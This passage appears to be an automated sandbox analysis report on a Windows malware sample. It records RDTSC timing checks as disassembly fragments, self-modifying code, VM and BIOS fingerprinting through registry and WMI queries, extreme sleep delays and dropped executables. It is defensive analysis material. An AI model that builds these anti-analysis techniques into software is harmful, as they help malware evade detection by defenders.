                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030304 second address: 5030331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C28D8B35Dh 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030331 second address: 5030341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Ch 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030341 second address: 5030380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007F4C28D8B35Fh 0x00000014 and esi, 6B5661DEh 0x0000001a jmp 00007F4C28D8B369h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030380 second address: 5030386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030386 second address: 503038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50303F5 second address: 50303FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50303FB second address: 503044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F4C28D8B367h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 jmp 00007F4C28D8B360h 0x00000017 popad 0x00000018 mov esp, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C28D8B367h 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503044B second address: 5030451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030451 second address: 5030455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 528C0F second address: 528C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4C28D8B358h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, 0BD1h 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D22CCh] 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2486h], eax 0x00000038 xchg eax, ebx 0x00000039 jno 00007F4C28D8B35Ah 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F4C28D8B356h 0x00000049 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529681 second address: 529695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4C288D038Ch 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529695 second address: 5296AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B361h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5296AA second address: 52971E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C288D0388h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, 7A163AAFh 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+12463680h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F4C288D0388h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jbe 00007F4C288D038Ch 0x00000058 jo 00007F4C288D0386h 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E933C second address: 4E934A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jnc 00007F4C28D8B356h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 52D298 second address: 52D307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B362h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f ja 00007F4C28D8B356h 0x00000015 pop edi 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop esi 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F4C28D8B358h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 sub dword ptr [ebp+122D316Ch], eax 0x0000003c push 00000000h 0x0000003e mov bx, ax 0x00000041 movzx edi, ax 0x00000044 push 00000000h 0x00000046 mov ebx, dword ptr [ebp+122D2B00h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C28D8B35Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 52E33F second address: 52E357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 52F323 second address: 52F36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4C288D0386h 0x00000009 jne 00007F4C288D0386h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F4C288D038Ah 0x0000001a push 00000000h 0x0000001c mov edi, ecx 0x0000001e mov bx, 4300h 0x00000022 push 00000000h 0x00000024 cld 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jng 00007F4C288D038Ch 0x0000002d jns 00007F4C288D0386h 0x00000033 push esi 0x00000034 jnp 00007F4C288D0386h 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 53024C second address: 530259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4C288D0386h 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 5343B5 second address: 5343C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F4C28D8B358h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 537348 second address: 5373C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F4C288D0386h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F4C288D0388h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2319h], ebx 0x0000002f push 00000000h 0x00000031 mov bx, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F4C288D0388h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 pushad 0x00000051 adc di, 4582h 0x00000056 mov esi, 6185CEFBh 0x0000005b popad 0x0000005c or edi, dword ptr [ebp+122D1830h] 0x00000062 xchg eax, esi 0x00000063 jp 00007F4C288D038Eh 0x00000069 push ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 5373C7 second address: 5373D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F4C28D8B356h 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 53B316 second address: 53B31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 53F71D second address: 53F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F4C28D8B356h 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f jo 00007F4C28D8B35Eh 0x00000015 jnp 00007F4C28D8B356h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007F4C28D8B35Dh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4C28D8B364h 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 5335AD second address: 5335CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e je 00007F4C28D8B356h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F4C28D8B356h 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 538420 second address: 53844F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4C28D8B35Dh 0x00000010 jmp 00007F4C28D8B366h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 53C4AE second address: 53C4DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C28D8B35Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C28D8B369h 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 5020214 second address: 502025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4C28D8B369h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4C28D8B368h 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 502025A second address: 502025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 502025E second address: 5020264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | RDTSC instruction interceptor: First address: 5020264 second address: 5020275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Dh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Special instruction interceptor: First address: 372826 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Special instruction interceptor: First address: 372899 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Special instruction interceptor: First address: 5A496A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 4A2826 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 4A2899 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 6D496A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Special instruction interceptor: First address: E85EC7 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Special instruction interceptor: First address: 102F5C7 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Special instruction interceptor: First address: 10579EF instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Special instruction interceptor: First address: 1042E1C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Special instruction interceptor: First address: 10BAC5C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Special instruction interceptor: First address: 12A6948 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Special instruction interceptor: First address: 132EFCA instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Special instruction interceptor: First address: EBE98C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Special instruction interceptor: First address: EE3FAC instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Special instruction interceptor: First address: F556C3 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Special instruction interceptor: First address: D223F9 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Memory allocated: 4BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Memory allocated: 4D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Memory allocated: 6D40000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Code function: 17_2_05090562 rdtsc 17_2_05090562
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_04E20000 sldt word ptr [eax] 28_2_04E20000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3658
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3402
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2729
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1337
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4487
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7825
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1907
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6971
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2091
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Window / User API: threadDelayed 449
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D51OAO8D0TVNMCQXHC.exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10128600101\60eb3ded99.exe
                      Source: C:\Windows\System32\spoolsv.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_31-16821
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_29-22772
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | API coverage: 3.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124 | Thread sleep count: 3658 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124 | Thread sleep count: 3402 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 | Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360 | Thread sleep count: 2729 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 | Thread sleep count: 1337 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6396 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756 | Thread sleep count: 4487 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668 | Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4524 | Thread sleep count: 290 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5420 | Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 | Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7060 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6244 | Thread sleep time: -58029s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6256 | Thread sleep count: 33 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6256 | Thread sleep time: -66033s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716 | Thread sleep count: 276 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716 | Thread sleep time: -8280000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6044 | Thread sleep count: 31 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 6044 | Thread sleep time: -62031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5400 | Thread sleep time: -38019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4120 | Thread sleep count: 32 > 30
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4120 | Thread sleep time: -64032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 4716 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe TID: 5720 | Thread sleep count: 48 > 30
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe TID: 6908 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 6392 | Thread sleep time: -38019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 4124 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 4124 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\spoolsv.exe TID: 1556 | Thread sleep count: 93 > 30
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe TID: 1576 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe TID: 5056 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA9BF4 FindFirstFileExW, 29_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 34_2_0096DBBE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0093C2A2 FindFirstFileExW, 34_2_0093C2A2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009768EE FindFirstFileW,FindClose, 34_2_009768EE
